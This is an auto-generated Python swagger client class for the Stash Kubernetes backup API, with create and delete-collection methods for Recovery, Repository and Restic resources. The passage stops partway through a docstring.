class StashAppscodeComV1alpha1Api(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_stash_appscode_com_v1alpha1_namespaced_recovery(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
create a Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_recovery(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Recovery body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, body, **kwargs) # noqa: E501
else:
(data) = self.create_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, body, **kwargs) # noqa: E501
return data
def create_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_recovery # noqa: E501
create a Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_recovery_with_http_info(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Recovery body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Recovery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_stash_appscode_com_v1alpha1_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_stash_appscode_com_v1alpha1_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Recovery', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_stash_appscode_com_v1alpha1_namespaced_repository(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
create a Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_repository(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Repository body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, body, **kwargs) # noqa: E501
else:
(data) = self.create_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, body, **kwargs) # noqa: E501
return data
def create_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
create a Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Repository body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Repository
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Repository', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_stash_appscode_com_v1alpha1_namespaced_restic(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
create a Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_restic(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Restic body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, body, **kwargs) # noqa: E501
else:
(data) = self.create_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, body, **kwargs) # noqa: E501
return data
def create_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, namespace, body, **kwargs): # noqa: E501
"""create_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
create a Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(namespace, body, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param ComGithubAppscodeStashApisStashV1alpha1Restic body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: ComGithubAppscodeStashApisStashV1alpha1Restic
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/restics', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComGithubAppscodeStashApisStashV1alpha1Restic', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery # noqa: E501
delete collection of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery_with_http_info(namespace, **kwargs) # noqa: E501
return data
def delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery # noqa: E501
delete collection of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_collection_namespaced_recovery`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/recoveries', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_stash_appscode_com_v1alpha1_collection_namespaced_repository(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_repository # noqa: E501
delete collection of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_repository(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_stash_appscode_com_v1alpha1_collection_namespaced_repository_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.delete_stash_appscode_com_v1alpha1_collection_namespaced_repository_with_http_info(namespace, **kwargs) # noqa: E501
return data
def delete_stash_appscode_com_v1alpha1_collection_namespaced_repository_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_repository # noqa: E501
delete collection of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_repository_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_stash_appscode_com_v1alpha1_collection_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_stash_appscode_com_v1alpha1_collection_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/namespaces/{namespace}/repositories', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1Status', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_stash_appscode_com_v1alpha1_collection_namespaced_restic(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_restic # noqa: E501
delete collection of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_restic(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_stash_appscode_com_v1alpha1_collection_namespaced_restic_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.delete_stash_appscode_com_v1alpha1_collection_namespaced_restic_with_http_info(namespace, **kwargs) # noqa: E501
return data
def delete_stash_appscode_com_v1alpha1_collection_namespaced_restic_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_stash_appscode_com_v1alpha1_collection_namespaced_restic # noqa: E501
delete collection of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_stash_appscode_com_v1alpha1_collection_namespaced_restic_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
